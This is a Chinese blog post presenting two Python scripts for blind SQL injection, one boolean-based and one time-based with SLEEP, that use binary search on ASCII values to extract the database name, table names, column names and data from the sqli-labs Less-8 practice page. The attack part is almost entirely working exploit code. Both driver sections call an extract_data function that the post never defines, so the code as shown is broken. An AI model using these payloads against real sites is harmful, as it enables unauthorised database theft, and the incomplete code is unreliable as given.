利用二分法+布尔盲注、时间盲注进行sql注入

Ajiang4212025-02-14 21:11

一、布尔盲注:

python 复制代码 
import requests
 
def binary_search_character(url, query, index, low=32, high=127):
    while low < high:
        mid = (low + high + 1) // 2
        payload = f"1' AND ASCII(SUBSTRING(({query}),{index},1)) >= {mid} -- "
        res = {"id": payload}
        r = requests.get(url, params=res)
 
        if "You are in.........." in r.text:
            low = mid
        else:
            high = mid - 1
 
    return chr(low) if low > 32 else ''
 
if __name__ == '__main__':
    url = 'http://127.0.0.1/sqlilabs/Less-8/index.php'
    database_name = extract_data(url, "SELECT database()")
    print(f"数据库名: {database_name}")
 
    table_name_query = f"SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{database_name}'"
    table_names = extract_data(url, table_name_query)
    print(f"表名: {table_names}")
 
    table_name = table_names.split(',')[0]
    column_name_query = f"SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}' AND table_schema='{database_name}'"
    column_names = extract_data(url, column_name_query)
    print(f"列名: {column_names}")
 
    column_name = column_names.split(',')[1]
    data_query = f"SELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}"
    extracted_values = extract_data(url, data_query)
    print(f"数据: {extracted_values}")
    print(f"数据库名: {database_name}")
    print(f"表名: {table_names}")
    print(f"列名: {column_names}")
    print(f"数据: {extracted_values}")

二、时间盲注:

python 复制代码 
import requests
import time
 
def binary_search_character(url, query, index, low=32, high=127):
    while low < high:
        mid = (low + high + 1) // 2
        payload = f"1' AND IF(ASCII(SUBSTRING(({query}),{index},1)) >= {mid}, SLEEP(2), 0) -- "
        res = {"id": payload}
        
        start_time = time.time()
        r = requests.get(url, params=res)
        response_time = time.time() - start_time
        
        if response_time > 1.5:  # 服务器延迟意味着条件成立
            low = mid
        else:
            high = mid - 1
 
    return chr(low) if low > 32 else ''
 
if __name__ == '__main__':
    url = 'http://127.0.0.1/sqlilabs/Less-8/index.php'
    database_name = extract_data(url, "SELECT database()")
    print(f"数据库名: {database_name}")
 
    table_name_query = f"SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{database_name}'"
    table_names = extract_data(url, table_name_query)
    print(f"表名: {table_names}")
 
    table_name = table_names.split(',')[0]
    column_name_query = f"SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}' AND table_schema='{database_name}'"
    column_names = extract_data(url, column_name_query)
    print(f"列名: {column_names}")
 
    column_name = column_names.split(',')[1]
    data_query = f"SELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}"
    extracted_values = extract_data(url, data_query)
    print(f"数据: {extracted_values}")
相关推荐
Ricky_Theseus9 分钟前
SQL Server 的五种约束类型
数据库·sql·oracle
沪漂阿龙5 小时前
深度解析SQL查询:从关联查询到子查询,一文掌握数据库核心技能
数据库·sql
Ricky_Theseus6 小时前
SQL Server2008 select语句基本语法
数据库·sql
淼淼爱喝水10 小时前
DVWA手动盲注SQL实验(详细教程)
数据库·sql·网络安全·oracle·dvwa
FL4m3Y4n20 小时前
MySQL索引原理与SQL优化
android·sql·mysql
落日漫游21 小时前
MySQL约束:6大核心机制详解
sql
不会写DN1 天前
GORM 实战入门:从环境搭建到企业级常用特性全解析
sql·mysql·go·gin
gjc5921 天前
如何写好SQL:企业内训文档
数据库·sql
代码派1 天前
SQL 审核解决了部分问题,另一部分是慢 SQL 治理
数据库·sql·mysql·数据库管理工具·ninedata·sql审核·sql治理
热门推荐
012026年3月AI领域大事件:DeepSeek引领开源风暴02GitHub 镜像站点03围棋-html版本04小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)05班级宠物园部署指南06【计算机一级WPSoffice】小黑课堂题库软件下载安装教程(2026年3月最新版)07UV安装并设置国内源08“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)09中国象棋-html版本10Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南